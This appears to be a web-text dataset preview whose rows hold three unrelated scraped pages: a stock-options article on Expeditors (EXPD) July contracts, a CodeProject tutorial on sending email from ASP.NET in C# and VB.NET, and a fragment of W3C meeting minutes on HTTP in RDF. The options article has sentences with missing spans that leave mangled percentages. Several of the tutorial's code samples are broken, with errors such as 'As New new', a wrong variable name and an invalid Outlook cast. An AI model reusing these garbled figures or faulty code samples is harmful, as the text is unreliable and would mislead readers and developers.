text stringlengths 454 608k | url stringlengths 17 896 | dump stringclasses 91 values | source stringclasses 1 value | word_count int64 101 114k | flesch_reading_ease float64 50 104 |
|---|---|---|---|---|---|
Investors in Expeditors International of Washington, Inc. (Symbol: EXPD) saw new options become available this week, for the July 15th expiration. At Stock Options Channel, our YieldBoost formula has looked up and down the EXPD options chain for the new July 15th contracts and identified one put and one call contract of particular interest.
The put contract at the $95.00 strike price has a current bid of $2.15. If an investor was to sell-to-open that put contract, they are committing to purchase the stock at $95.00, but will also collect the premium, putting the cost basis of the shares at $92.85 (before broker commissions). To an investor already interested in purchasing shares of EXPD, that could represent an attractive alternative to paying $103.66/share today.
Because the $95 2.26% return on the cash commitment, or 14.75% annualized — at Stock Options Channel we call this the YieldBoost.
Below is a chart showing the trailing twelve month trading history for Expeditors International of Washington, Inc., and highlighting in green where the $95.00 strike is located relative to that history:
Turning to the calls side of the option chain, the call contract at the $105.00 strike price has a current bid of $4.10. If an investor was to purchase shares of EXPD stock at the current price level of $103.66/share, and then sell-to-open that call contract as a "covered call," they are committing to sell the stock at $105.00. Considering the call seller will also collect the premium, that would drive a total return (excluding dividends, if any) of 5.25% if the stock gets called away at the July 15th expiration (before broker commissions). Of course, a lot of upside could potentially be left on the table if EXPD shares really soar, which is why looking at the trailing twelve month trading history for Expeditors International of Washington, Inc., as well as studying the business fundamentals becomes important. Below is a chart showing EXPD's trailing twelve month trading history, with the $105.00 strike highlighted in red:
Considering the fact that the $105.78% annualized, which we refer to as the YieldBoost.
The implied volatility in the put contract example is 41%, while the implied volatility in the call contract example is 34%.
Meanwhile, we calculate the actual trailing twelve month volatility (considering the last 253 trading day closing values as well as today's price of $103.66) to be 27%. For more put and call options contract ideas worth looking at, visit StockOptionsChannel.com.
The views and opinions expressed herein are the views and opinions of the author and do not necessarily reflect those of Nasdaq, Inc. | https://www.nasdaq.com/articles/first-week-of-july-15th-options-trading-for-expeditors-international-of-washington | CC-MAIN-2022-27 | refinedweb | 455 | 65.42 |
Sending email is becoming a minimum requirement for any web application in these days. Microsoft Visual Studio .Net 2005 aimed to reduce the code we write. Which results the birth of numerous powerful packages.Here I will show three approaches for this,
Note That the above three methods can only send email. To read email you either need a Mime parsing component such as aspNetMime or a POP3 component such as aspNetPOP3.
If you are not a using ASP.NET 2.0 then you can do it using DotNetOpenMail.dll API, which I had discussed in my previous article Sending Emails using .NET Part I please go through it if you are not using ASP.NET 2.0. Check if the Microsoft SMTP Server is turned on. To do this either open the Internet Services Manager directly or open Computer Management and Navigate to Internet Information Services -> Default SMTP Virtual Server and checkout if the button with the 'play' icon on it is disabled, that means it is already started.
The SmtpServer property This mail will by default be sent through the local SMTP server. You can specify a different SMTP server, by setting the SmtpServer string property on the SmtpMail class. Since SmtpMail is a static class and SmtpServer is a shared static property, once this property has been set, it will be used for all other calls to the SmtpMail.Send method, even in different web applications.
The System.Web.Mail namespace has three classes.
The SmtpMail is a static class. That is, we do not need to instantiate an object from this class. That is, this class is Ready Made; you can directly invoke the methods as it is static
System.Web.Mail.SmtpMail.Send ("senderID@domainName.com",
"receiverID@domainName.com","Subject of the Mail”,
” Message Body");
//Using Namespaces that are to be included for email feature is
Using System.Web.Mail;
/*
Five Easy Steps to create and Send emails
Step 1: Create a MailMessage object
Step 2: Set the to, from, subject properties of MailMessage
Step 3: Set the BodyFormat to MailFormat.Html or Text,
Step 4: Set the Body Text for the MailMessage
Step 5: Send the MailMessage using SmtpMail.send method
Using SmtpMail class is very simple the below code will let you know this fact.
*/
/* Step 1*/
// C#.NET CODE
<% @Page Language="C#" %>
VB.NET Code
/*Step 1*/
<%@Page Language="VB" %>
<% @Import Namespace= "System.Web.Mail" %>
<%
Dim message As MailMessage
message = New MailMessage ()
/*Step 2*/
message. To = "receiverID@domainName.Com"
message. From = "sender@domainName.com"
message. Subject = "Email Subject"
/*Step 3*/
message.BodyFormat = MailFormat.Html
/*Step 4*/
msgMail.Body = "<html><body><h2 " +
"align = center>Hello World! " +
"</h2></body></html>";
/*Step 5*/
SmtpMail.Send (message)
response. Write ("<BR><font color=red" +
" face=verdana size=2> " +
"Sent the mails. </font>")
%>
Here is the sample code to attach a sample text file
MailAttachment attachment1 =
new MailAttachment (@"c:\My Documents\OfficeFile1.doc");
// Add Another One...
MailAttachment attachment2 =
new MailAttachment ("d:\\Documents\\asp.netTurorial.doc");
message.Attachments.Add (attachment1);
message.Attachments.Add (attachment2);
SmtpMail.Send (message);
For the users who are using ASP.NET 1.1 System.Web.Mail will work but it is deprecated in current version. We can say that System.Net.Mail is the replacement of System.Web.Mail as it comes with more features such as authentication, that is from what domain name and with what user id the use is sending the emils. This is done using System.Net.NetworkCredential as you will see in below code. The System.Net.Mail namespace contains the SmtpClient and MailMessage Classes that we need in order to send the email and specify the user credentials necessary to send authenticated email.
C#.NET CODE
The Using Statement
using System.Net.Mail;
<span style="font-size: 9pt;"> /* create the email message */</span>
MailMessage message = */
SmtpClient smtpClient = new SmtpClient("Your SMTP Server");
smtpClient.UseDefaultCredentials = false;
smtpClient.Credentials = new NetworkCredential("userID",
"password", "domainName");
/*Send the message */
smtpClient.Send(message);
VB.NET CODE
The Using Statement
imports System.Net.Mail;
Dim message As */
Dim emailClient As New new SmtpClient("Your SMTP Server")
Dim SMTPUserInfo As New new NetworkCredential("userID", "password", "domainName")
/*Send the message */
The Web.config file
<?xml version="1.0"?>
<CONFIGURATION>
<SYSTEM.NET>
<MAILSETTINGS>
<SMTP from="authicationEmailID@yourdomain.com">
<NETWORK password="password"
userName="UserID" port="25"
host="smtp.yourdomain.com"/>
</SMTP>
</MAILSETTINGS>
</SYSTEM.NET>
</CONFIGURATION>
There are other properties that you can set, such as the message priority, whether it should be text or HTML, and the encoding type. More information about these additional properties should be available in the ASP.Net framework documentation. Note That the Send method do not have return values about the success of dispatching the email message. The reason for this is that the emails simply are written into the Pickup folder of the Inetpub directory from where they are read and then sent by the SMTP Service. Failed emails (dispatching errors) also are written into files, and moved to Badmail folder.
Using Microsoft Outlook is ingeneral not preferable but just discussing the possible ways of sending emails. Take a look at it.
Step 1: Add a reference to the Outlook library
Step 2: import the Outlook namespace:
Imports Outlook
Step 3: Then, add code to create a new MailItem and set its properties to the information which is already known. Finally, display the MailItem. Here’s the complete code
'Create Outlook application.
OutlookApplication = New Outlook. Application
'Create Outlook MailItem
Dim message As MailMessage message = New MailMessage ()
message. To = "receiverID@domainName.Com"
message. From = "sender@domainName.com"
message. Subject = "Email Subject"
OutlookMailItem = CType (OutlookApplication.CreateItem (
OlItemType.olMailItem), message)
'Display MailItem.
OutlookMailItem.Display ()
Using Outlook is easy but the programmer is the ultimate judge to decide what approach is to be used in his application.
Microsoft .NET is extremely powerful and yet simple to work with. I Hope that you will get a basic understanding of how to create and send email's with ASP.NET 2.0 simple and compact code.
Version 1.0 Release. | https://www.codeproject.com/articles/14045/sending-emails-using-net-part-ii?fid=302559&df=90&mpp=10&sort=position&spc=none&tid=2904301 | CC-MAIN-2017-09 | refinedweb | 1,001 | 50.94 |
I tested this solution on my computer and it seems to be giving the correct answer. I am using the "1) find mid 2) reverse 3) merge" approach. Can anybody provide any insight?
def reverseList(self, head): """ :type head: ListNode :rtype: ListNode """ if not head or not head.next: return head prev = None cur = head nxt = cur.next while cur: cur.next = prev prev = cur if not nxt: break cur = nxt nxt = nxt.next return cur def reorderList(self, head): """ :type head: ListNode :rtype: void Do not return anything, modify head in-place instead. """ if not head: return head if not head.next: # 1 node, no change return head if not head.next.next: # 2 nodes, no change return head oneStep = head twoStep = head while twoStep.next and twoStep.next.next: oneStep = oneStep.next twoStep = twoStep.next.next curMid = self.reverseList(oneStep.next) cur = head oneStep.next = curMid while curMid: tmp = cur.next tmp2 = curMid.next cur.next = curMid curMid.next = tmp cur = tmp curMid = tmp2 | https://discuss.leetcode.com/topic/44544/don-t-understand-why-time-limit-exceeded | CC-MAIN-2017-47 | refinedweb | 166 | 81.19 |
XQuery/Wikipedia Lookup
Page scraping is one way to retrieve a specific fact from a page provided its structure is stable.
Here the task is to use wikipedia to find the Latin name for a bird, given its common name.
declare namespace
Here, the path to locate the data required, assuming the page is in Bird page format, involves complex XPath expressions. For example, the genus is the second cell in a table row whose first cell is 'Genus'.
The script often fails because:
It is not hard to see that more semantic markup with ontological relationships would be preferable to these uncertain contortions. | https://en.wikibooks.org/wiki/XQuery/Wikipedia_Lookup | CC-MAIN-2018-30 | refinedweb | 104 | 67.49 |
12 May 2010 18:03 [Source: ICIS news]
LONDON (ICIS news)--Kuwait Petroleum Corporation (KPC) has awarded its 12 May sulphur sales tender at a price “similar to the current market level” amid a weak spot market, a company official said on Wednesday.
The Kuwaiti sulphur producer awarded 25-30,000 tonnes of sulphur to a trader at around $130/tonne (€103/tonne) FOB (free on board).
The company official said the cargo, for 4-6 June shipment from Shuaiba, will be shipped to the east. Freight rates to ?xml:namespace>
The spot cargo had come from KPC’s uncommitted sulphur availability for the second quarter. The producer concluded two-thirds of its contracts in the range of $150-160/tonne FOB.
KPC received six bids for this sales tender, of which the official commented: “Although the market remains quiet, we expected better and more offers.”
A weaker spot market has been evident in
Traders commented that Chinese spot buyers were rejecting offers above $150-155/tonne CFR (cost and freight).
($1 = €0.79) | http://www.icis.com/Articles/2010/05/12/9358858/kpc-awards-sulphur-sales-tender-at-around-130tonne-fob.html | CC-MAIN-2014-49 | refinedweb | 174 | 59.74 |
how to run c program command prompt ?
The C language is designed to create small, fast programs. It’s
lower-level than most other languages.
C is a compiled language. That means the computer will not interpret the code
directly. Instead, you will need to convert—or compile—the human-readable
source code into machine-readable machine code.
You start off by creating a source file. The source file contains human-readable C code.
Save the code in a file called hello.c
hello.c
#include <stdio.h> int main() { puts("C rocks! 5455"); printf("C is the best!"); return 0; }
Run your source code through a compiler. The compiler checks for errors, and once it’s happy, it compiles the source code.
Compile with gcc hello.c -o hello at a command prompt or terminal.
gcc hello.c -o hello
The compiler creates a new file called an executable. This file contains machine code, a stream of 1s and 0s that the computer understands. And that’s the program you can run.
By using ls command you can see an Executable file called hello
Run by typing ./hello on Mac and Linux machines.
./hello C rocks! 5455 C is the best! | https://www.flyhiee.com/uncategorized/how-to-run-c-program-command-prompt/ | CC-MAIN-2020-50 | refinedweb | 202 | 80.17 |
Data.Array.IO.Internals hidden in GHC6.8 for no good reason
I had some fast array modification code in C to modify the contents of an IOUArray, because I couldn't get my Haskell performance up to snuff. Now that module is hidden in the array package and it doesn't seem possible to unhide it.
The code compiled & worked quite well in GHC6.6. I understand that by going into the internals I may have to update the code as the internals change, but it doesn't seem to be possible to do so at all at this point. The only workaround I can think of is to figure out the internal type from the source, re-declare it locally, and use unsafeCoerce# shenanigans to extract the data. That seems terrible, since future changes to the internals could cause the code to start crashing without any compile-time warning at all.
Bitmap.hs:
{-# OPTIONS_GHC -fffi -fglasgow-exts #-} {-# INCLUDE "bitmap_operations.h" #-} module Bitmap(clearBitmap) where c sz = clear_bitmap (unsafeGetMutableArray# a) c sz
bitmap_operations.h:
#include "HsFFI.h" void clear_bitmap(void* p, HsWord32 color, HsWord32 size); | https://gitlab.haskell.org/ghc/ghc/-/issues/2473 | CC-MAIN-2021-21 | refinedweb | 186 | 64.3 |
#include <Pt/System/Timer.h>
Notifies clients in constant intervals. More...
Timers can be used to be notified if a time interval expires. It usually works with an event loop, where the Timer needs to be registered. Timers send the timeout signal in given intervals, to which the interested clients connect. The interval can be changed at any time and timers can switch between an active and inactive state.
The following code calls the function onTimer every second:
Constructs an inactive timer.
The destructor sends the destroyed signal.
Start a timer from the moment this method is called. The Timer needs to be registered with an event loop, otherwise the timeout signal will not be sent.
If the Timer is registered with an event loop, the timout signal will not be sent anymore.
This signal is sent if the interval time has expired. | http://pt-framework.org/htdocs/classPt_1_1System_1_1Timer.html | CC-MAIN-2017-13 | refinedweb | 143 | 67.04 |
Working with strings is important in any programming language because of the ubiquitous nature of string data. Name, addresses, descriptions and many more data fields are are stored as strings. Groovy gives the developer helpful methods (functions) for processing strings. We will look at several useful methods in the example below.
To work with strings in Groovy, follow these three steps.
def fullName = "Jones/Norman" println "Display first character of fullName: ${fullName[0]}" def indexOfSlash=fullName.indexOf("/") println "First name is ${fullName.substring(indexOfSlash+1)}" println "Last name is ${fullName.substring(0,indexOfSlash)}" println "Lower case: ${fullName.toLowerCase()} Upper case: ${fullName.toUpperCase()}"
fullNamethat contains a person's last name and first name. The last name is separated from the first name by a forward slash ("/"). Note that we can display the first character of the name by treating
fullNameas an array of characters. To determine the location of the slash, we use the
indexOffunction, or method. We can display the first name by using the
substringfunction to display the characters of full name between the location of the slash plus one and the end of the string (the default ending location for
substring). To display the last name, we again use
substringspecifying a beginning location of "0" and a substring length that is equal to the index of the slash character. Lastly, we use the appropriate methods to convert the string to lower case and upper case.
WorkWithStrings. | https://www.webucator.com/how-to/how-work-with-strings-groovy.cfm | CC-MAIN-2018-17 | refinedweb | 238 | 58.08 |
How to: Author a Unit Test
There are two reasons to edit a unit test: You are authoring it by hand, or you are editing a newly generated unit test. Although you can run newly generated unit tests, they are created with default content that must be initialized to appropriate values before the test can produce meaningful results. Within a generated unit test, you typically need to customize variable assignments and one or more Assert statements.
Using Assert Statements in Unit Tests
By default, each generated unit test calls the Inconclusive method, which causes the test to fail because the test is still essentially unimplemented. Your next step is to add meaningful code to check the correct operation of the method being tested. A typical way to do this is to generate a value and then compare it with an expected value by using an Assert.AreEqual statement. For an example, see "Unit Test Example" in Structure of Unit Tests. Newly generated unit tests contain "To-do" comments that suggest changes to make.
A unit test that contains no Assert statement automatically passes as long as it does not time out and does not throw an unexpected exception. For more information, see Basic Test Results and Using the Assert Classes.
Opening and Authoring Unit Tests
This topic contains two procedures:
The first procedure describes how to edit an existing unit test. You typically do this to prepare a unit test that has been generated automatically. See How to: Generate a Unit Test.
The second procedure describes how to create and author a unit test by hand.
To edit an existing unit test
In your test project in Solution Explorer, locate and open the file that contains the unit test, and then locate the unit test method that you want to edit.
- or -
In Test View, double-click the unit test; this opens the file that contains the unit test and scrolls to the unit test method.
Locate the variable assignments in the method.
In newly generated tests, variable assignments are marked by "To-Do" statements that remind you to customize the assignments. For example, the following is a typical assignment that needs to be edited:
Assign an appropriate value to each variable.
To know what values are appropriate, consider the values that these variables may be initialized to before the method is called, the changes they may undergo when the method is called, and the results you expect. For an example of this process, see the procedure Run and Edit a Unit Test in Walkthrough: Creating and Running Unit Tests.
Locate and edit the Assert statements in the method. If necessary, add additional Assert statements.
The Unit Testing Framework provides numerous additional Assert classes and methods that give you flexibility in writing useful Assert statements. For more information, see Unit Testing Framework.
To create a unit test by typing it in
In Solution Explorer, right-click a test project, point to Add, and click New Test.
- or -
Right-click the surface of the Test View window and then click New Test.
This displays the Add New Test dialog box.
Under Templates, click Unit Test and then click OK.
A new source code file with a name such as UnitTest1.cs is added to your test project, in the language of the test project. This file contains several things that unit tests require:
It references the Microsoft.VisualStudio.TestTools.UnitTesting namespace and the System namespace.
It defines its own namespace, which contains a test class. Test classes have the [TestClass] attribute.
It contains an initialization method and a cleanup method. These methods have the [TestInitialize()] and [TestCleanup()] attributes, respectively.
It contains one empty test method, with a [TestMethod] attribute. It is here that you add your test logic. This method has a default name such as TestMethod1().
This file is also opened in the window for editing source code. The new (empty) test method is displayed in the Test View and Test Manager windows.
Add test code to the test method.
The Unit Testing Framework provides numerous additional Assert classes and methods that give you flexibility in writing useful Assert statements. For more information, see Unit Tests Overview and Unit Testing Framework. | http://msdn.microsoft.com/en-US/library/ms182525(v=vs.80).aspx | CC-MAIN-2014-52 | refinedweb | 701 | 64.3 |
Content-type: text/html
#include <termios.h>
The <termios.h> header contains the definitions used by the terminal I/O interfaces. See termios(3C) and termio(7I) for an overview of the terminal interface.
The following data types are defined through typedef:
cc_t used for terminal special characters
speed_t used for terminal baud rates
tcflag_t:
NCCS
The input and output baud rates are stored in the termios structure. These are the valid values for objects of type speed_ t. The following values 1 200 baud
B1800 1 800 baud
B2400 2 400 baud
B4800 4 800 baud
B9600 9 600 baud
B19200 19 200 baud
B38400 38 400 baud supports the functionality associated with the symbols CS7, CS8, CSTOPB, PARODD, and PARENB..
The following symbolic constants for use with tcsetattr() are defined:
TCSANOW Change attributes immediately.
TCSADRAIN Change attributes when output has drained.
TCSAFLUSH Change attributes when output has drained; also flush pending input.
The following symbolic constants for use with tcflush() are defined:
TCIFLUSH Flush pending input.
TCIOFLUSH Flush both pending input and untransmitted output.
TCOFLUSH Flush untransmitted output.
The following symbolic constants for use with tcflow() are defined:
TCIOFF Transmit a STOP character, intended to suspend input data.
TCION Transmit a START character, intended to restart input data.
TCOOFF Suspend output.
TCOON) | http://backdrift.org/man/SunOS-5.10/man3head/termios.3head.html | CC-MAIN-2016-50 | refinedweb | 214 | 58.38 |
by Michael S. Kaplan, published on 2010/07/18 08:20 -07:00, original URI:
What are the languages of India? is a rather loaded question.
Not in the Have you stopped beating your wife yet? sense. But perhaps to some the two questions have a similar order of magnitude.
In the constitution of India, it is clear that the official languages of the country are Hindi (in the Devanagari script) and English (in the Latin script).
But a part of the constitution allows the recognition of official languages in individual states, and since the states had their borders largely decided based on language it seemed best to leave it to the states to work to define the official languages within the states.
With that said, there is a list of languages that have a special significance, whose latest incarnation is described here in Wikipedia:
The Eighth Schedule to the Indian Constitution contains a list of 22 scheduled languages. At the time the constitution was enacted, inclusion in this list meant that the language was entitled to representation on the Official Languages Commission,." In addition, a candidate appearing in an examination conducted for public service at a higher level is entitled to use any of these languages as the medium in which he answers the paper.
There are obviously benefits to being on this rather exclusive list -- this number 22 is out of either nearly 500 or over 1500 languages in India (depending on whose count you accept).
The list (table modified from here) in order of population is:
Now I threw that third column in to point out that not every decision made in regard to Windows has a pure population reason behind it. I could have used other list items like version of Windows where support was added if I wanted to show even more interesting and/or strange trends, but I figure this one is enough for present purposes.
Now of all of these languages the only one that cannot be displayed at all using the built in fonts in Windows 7 is Santali, which is written with the Ol Chiki script. But I was told that literacy rates among speakers is low, so perhaps that 6.5 million number shouldn't be thought of purely in terms of "theoretical potential customers". Though of course other numbers would change on this list as well, with that metric. :-)
Microsoft Windows and Office don't seem all that well aimed at the "silent majority" (~93%) in India who don't speak English, but we'll leave that interesting issue for another day....
There are only a few real anomalies on this list:
And the most unusual of the anomalies on this list? It can be seen in Urdu, which as I mentioned in Giving the people Urdu, we are! can really be thought of as the same underlying language as Hindi, with both of them grown in different directions.
Directions that have helped to fuel the differences between india and Pakistanfor lo these many years, in fact.
Yet in Windows, where an Urdu - Pakistan locale exists, no Urdu - India one is to found!
Though space has been reserved for it, as charts in both Locale IDs Assigned by Microsoft and Language Identifier Constants and Strings indicate (technically the same could be said for Manipuri - India and Nepal - India and Sindhi - India, now that I look at the lists!). I'm not sure whether that counts as transparency or some people publishing the wrong lists!
I was asked by five different people while I was in India about what is holding up an Urdu - India , but to be honest I have no earthly clue. I was told that the folks in the subsidiary have asked for it, but I was unable to verify that bit of information at the time this blog was written.
The bulk of the data in the locale would be identical to Urdu - Pakistan, but there are incredibly good reasons to really want Urdu - India to be separate and not ask people to use "the wrong one".
So, ignoring everything else but the customer requirement for a moment, I am going to use the method described in Where are the other Tamils? and create a custom locale for ur-IN. :-)
Here is the code:
using System;
using System.Globalization;
namespace CustomLocales {
class CustomLocales {
[STAThread]
static void Main() {
CultureInfo ci = new CultureInfo("ur-IN", false);
RegionInfo ri = new RegionInfo("en-IN");
CultureAndRegionInfoBuilder carib = new CultureAndRegionInfoBuilder("ur-IN", CultureAndRegionModifiers.None);
carib.LoadDataFromCultureInfo(ci);
carib.LoadDataFromRegionInfo(ri);
carib.CultureEnglishName = "Urdu (India)";
carib.CultureNativeName = "اُردو (بھارت)"; // Ignore the way it looks, the string is right! :-)
carib.CurrencyEnglishName = ri.CurrencyEnglishName;
carib.CurrencyNativeName = "روپیہ";
carib.RegionNativeName = "بھارت";
carib.NumberFormat.CurrencySymbol = "Rs.";
carib.ThreeLetterWindowsLanguageName = "URI"; // Instead of URD as ur-PK has
carib.IetfLanguageTag = carib.CultureName;
carib.Save("ur-IN.ldml");
carib.Register();
}
}
}
In the course of putting all that together, someone pointd out an interesting issue in the Urdu (Pakistan) locale. It's native currency name in Windows 7 is
روپيه
which includes U+064a, ARABIC LETTER YEH. This seems like a bug since U+06cc, ARABIC LETTER FARSI YEH almost certainly seems like it would be prefered by Urdu-speaking people in either country.
But in any case the following slightly different string was recommended to me:
روپیہ
so I chose that one in the case of the above code; if you disagree then of course you can change the string, as well as the ThreeLetterWindowsLanguageName I used....
If I am right about the built-in ur-PK data, someone should put in a bug to get that fixed in some future version of Windows, by the way. Any former NLS testers reading this? :-)
If it exists then it is a subtle bug, since as I mentioned in Every character has a story #18: U+06cc and U+064a (ARABIC LETTER FARSI YEH and ARABIC LETTER YEH), in the initial and medial forms the two letters look identical (and this is obviously the medial form since it is the penultimate chacracter in the string).
Anyway, just take the code, save it to a file as ur-IN.cs, and then compile it from the command line with the following line of code:
csc /r:sysglobl.dll ur-IN.cs
And once you do that, the landscape in Regional and Language Options will change a little bit:
And there we go! :-)
Now ideally one would be able to use the reserved LCID value mentioned in those other articles, but that is not an option in this case.
But no solution is perfect....
Sometimes it really still is about opening it all up and getting out of the way, as best as we can....
referenced by
go to newer or older post, or back to index or month or day | http://archives.miloush.net/michkap/archive/2010/07/18/10039492.152048.html | CC-MAIN-2018-05 | refinedweb | 1,138 | 58.42 |
Topic
Pinned topic What is the best way to migrate from GLASSFISH 3.1 to WAS 8.0?
2011-07-28T13:39:11Z |
I have developed my application in Netbeans IDE and deployed in Glassfish 3.1. I would really appreciate if someone can show me the best method to port my source code to RAD/WAS 8.0 combination.
Updated on 2012-12-13T14:34:58Z at 2012-12-13T14:34:58Z by SystemAdmin
- Scott Johnston 2000000W4P125 Posts
Re: What is the best way to migrate from GLASSFISH 3.1 to WAS 8.0?2011-08-03T14:29:57Z
This is the accepted answer. This is the accepted answer.I contacted members of the WAS development team and the method they suggested for migrating an application developed in NetBeans for Glassfish into WebSphere Application Server is as follows:
The user in this case has to do at least 3 steps:
1. Migrate the code from NetBeans to RAD manually using the correct New Project Wizards, like Dynamic Web Applications for Web Modules, EJB Applications for EJB Modules
2. Fix the code and the classpath issues, if any.
3. update the IBM ext files when necessary. If the user created the project as stated in #1 above, there will be visual panels that they can navigate, but if they just ported the application as only a Java Project, this step will be a lot harder.
And then export and deploy to WAS.
Another developer added...
As part of Step #1 above, the user could use the EAR file produced from NetBeans and import the EAR into RAD. This might be the easiest way to get projects created. The user would still need to manually move the source. Eclipse has the option of exporting source with an EAR. NetBeans might have the same option, that might help.
Lastly, although it won't help for the NetBeans and Glassfish scenario, others who want to migrate applications from WebLogic, JBoss or Oracle Application Servers can use the IBM WebSphere Application Server Migration Toolkit.
The Application Migration Toolkit is available for download from the developerWorks website:
Regards,
Scott Johnston
WebSphere Application Server
Install & Configuration User Experience Lead
Re: What is the best way to migrate from GLASSFISH 3.1 to WAS 8.0?2011-08-23T18:10:42Z
This is the accepted answer. This is the accepted answer.
- Scott Johnston 2000000W4P
- 2011-08-03T14:29:57Z
1) I sticked onto Netbeans and did not port my application to RAD. I have removed unnecessary xml files and at the end kept web.xml, persistenc.xml and sun-web.xml.
2) I have used Jersey implementation for JAX-RS 1.1 and so included those jars in the lib folder.
3) I have used eclipselink vendor for JPA 2.0. For this I needed to change persistence.xml to include the following items:
<provider>org.eclipse.persistence.jpa.PersistenceProvider</provider>
<properties>
<property name="eclipselink.target-server" value="WebSphere"/>
<property name="eclipselink.logging.level" value="FINEST"/>
</properties>
4) I have placed eclipselink jars under lib folder of websphere (Appserver)
5) Default transport protocol for glassfish is 8080 and so instead of changing the code I have configured WAS 8.0 to 8080 (from 9080).
I did not want to go for RAD as Netbeans is doing my work and more over RAD has a different implementation for JAX-RS 1.1 and calling entities in the application for JPA. As, I don't want to change my code I am sticking onto netbeans. Also, the app can easily be deployed in weblogic.
- Scott Johnston 2000000W4P125 Posts
Re: What is the best way to migrate from GLASSFISH 3.1 to WAS 8.0?2011-08-23T21:12:35Z
This is the accepted answer. This is the accepted answer.
- RajivKonkimalla 270004DV2G
- 2011-08-23T18:10:42Z
Regards,
Scott Johnston
WebSphere Application Server
Install & Configuration User Experience Lead
Re: What is the best way to migrate from GLASSFISH 3.1 to WAS 8.0?2011-10-18T18:39:12Z
This is the accepted answer. This is the accepted answer.
- Scott Johnston 2000000W4P
- 2011-08-23T21:12:35Z
I have several custom user defined exceptions and interested in sending the mobile client the error code along with the custom defined error message. With the help of the forum, I could successfully do this when I deployed the application in Glassfish 3.1. Following forum thread gives the full information:
The problem came when app is deployed in the latest WAS 8.0. Now the client can only get the status code (what ever server sends) but not the error message, which always shows "Undefined". However, web client (browser) gives the correct information like
"Error 520: The EmailId or Password you entered is incorrect."
Following is the sample code that runs successfully in Glassfish 3.1 but fails in WAS 8.0
------EXCEPTION response------------
public class UserNotFoundResponse implements Response.StatusType{
@Override
public int getStatusCode() { return 520; }
@Override
public Response.Status.Family getFamily() { return Response.Status.Family.SERVER_ERROR; }
@Override
public String getReasonPhrase() { return "The EmailId or Password you entered is incorrect."; }
}
-----calling the exception from restful web service---------------
@GET
@Produces("text/xml")
public Advertisements getAdvertisements(.....) {
try { //business logic }catch(UserNotFoundException ex) { throw new WebApplicationException(ex, Response.status(new UserNotFoundResponse()).build()); }catch(Exception ex) { ... }
}
I feel that some configuration change in WAS 8.0 would solve this problem as the same code works fine in Glassfish 3.1. I would really appreciate if some WAS team member looks into my problem.
Re: What is the best way to migrate from GLASSFISH 3.1 to WAS 8.0?2011-10-25T15:16:14Z
This is the accepted answer. This is the accepted answer.
- Scott Johnston 2000000W4P
- 2011-08-03T14:29:57Z
- SystemAdmin 110000D4XK64 Posts
Re: What is the best way to migrate from GLASSFISH 3.1 to WAS 8.0?2012-12-13T14:34:58Z
This is the accepted answer. This is the accepted answer.Thanks for sharing all this information. AFAIK, the META-INF folder containing persistence.xml should be in WebContent of the web module. Is this correct? | https://www.ibm.com/developerworks/community/forums/html/topic?id=77777777-0000-0000-0000-000014644327&ps=25 | CC-MAIN-2017-39 | refinedweb | 1,015 | 59.9 |
Delegate.
Daxif
2.3.1.1
dotnet add package Delegate.Daxif --version 2.3.1.1
paket add Delegate.Daxif --version 2.3.1.1
The NuGet Team does not provide support for this client. Please contact its maintainers for support.
Release Notes
Fixed missing license in Github page
Fixed an error in Diff module and added check if file exist when performing Diff
Added additional information when importing and solution along with saving XML
import file even when import fails
Fixed spelling error in the new data scripts
Dependencies
- FSharp.Core (= 4.0.0.1)
- Microsoft.CrmSdk.CoreAssemblies (= 8.1.0.2)
- Microsoft.CrmSdk.CoreTools (= 8.1.0.2)
- Suave (= 1.1.0)
- XMLDiffPatch (= 1.0.8.28) | https://www.nuget.org/packages/Delegate.Daxif/2.3.1.1 | CC-MAIN-2019-13 | refinedweb | 119 | 61.43 |
[SOLVED]Show and use a custom dialog from within a widget or mainwindow
Hi all,
I have a 'stupid' question about using a costum dialog from within a widget/mainwindow.
I have a widget with a pushbutton, when i push the button i want to show a custom dialog and use its input to work with inside the first widget.
When i try this from within 'main.cpp' it works without a problem, but when i use the same from within the widget nothing seems to happen.
Does anybody know what im doing wrong or better, where i have to look for it?
This seems to not work:
@
//filename is widget.cpp
#include "dialog.h"
void Widget::on_pushButton_clicked()
{
this.hide(); //works
Dialog d; // doesnt work?
d.show(); // doesnt work
}
@
This works:
@
//filename is main.cpp
#include "dialog.h"
int main(int argc, char *argv[])
{
QApplication a(argc, argv);
Dialog d; //works
d.show(); //works
return a.exec();
}
@
I know that i can make a function within the main.cpp to get it work, but i want to use it from within the widget.cpp and not use the main.cpp for functions ed. Is this possible or is it a really stupid question?
Thanks in advance,
vinb.
You should not hide your main widget.
You should call d.exec() on the dialog. This opens the new window as modal dialog, i.e. it blocks input to all other windows while it is open. exec() returns when the dialog is closed (either by accept() or by reject(). See the docs of "QDialog": for some more information.
This looks a lot like another, "very recent discussion": here. You did "search before asking":, didn't you?
Thanks both!
And yes i've searched but with the wrong keywords i quess. :)
Sorry, for wasting your time. | https://forum.qt.io/topic/4686/solved-show-and-use-a-custom-dialog-from-within-a-widget-or-mainwindow | CC-MAIN-2019-09 | refinedweb | 302 | 78.85 |
[Bug?] QGraphicsWidget, transparent background, stylesheet
- wolfgang p.
What I want is a half-transparent QGraphicsWidget with rounded borders.
I'm trying to achieve this by setting background-color and border-radius in the widgets stylesheet.
But what happens is that the background is drawn TWICE, once inside the rounded borders and once all over the boundingRect of the corresponding graphics-proxy-item.
Here is a simple example (tested with Qt 4.7.3 on win7-32bit):
@
#include <QtGui/QApplication>
#include <QGraphicsView>
#include <QGraphicsScene>
#include <QPushButton>
int main(int argc, char *argv[])
{
QApplication a(argc, argv);
QGraphicsView view;
QGraphicsScene scene(0, 0, 400, 100);
view.setScene(&scene;); QPushButton w("just a button"); w.setGeometry(0, 0, 400, 100); a.setStyleSheet("QPushButton {background-color:rgba(0,0,0,127);border-radius:50px}"); scene.addWidget(&w); view.show(); return a.exec();
}
@
I searched around and tried a lot of things (e.g. manipulating the widgets palette), but nothing worked.
I would really like to know if this is a problem with Qt, or if I'm just doing something wrong... | https://forum.qt.io/topic/7713/bug-qgraphicswidget-transparent-background-stylesheet | CC-MAIN-2018-39 | refinedweb | 177 | 51.95 |
Agenda
See also: IRC log
<shadi>
SAZ: Let's have a look first to HTTP in RDF
... first the abstract
CV: typo in the last sentence
SAZ: Next section
JK: what is the special vocabulary for
HTTPS?
... don't think we have anything special for HTTPS
SAZ: should be just including HTTPS
... back to the Status section
... couple of editorial notes
... what changes happenned and what feedback are we looking for
... a sort of two minutes elevator speech
... any other open questions on the section?
... lets move on and come back to this section later
JK: what about the namespace for Content?
SAZ: we can assume it as correct
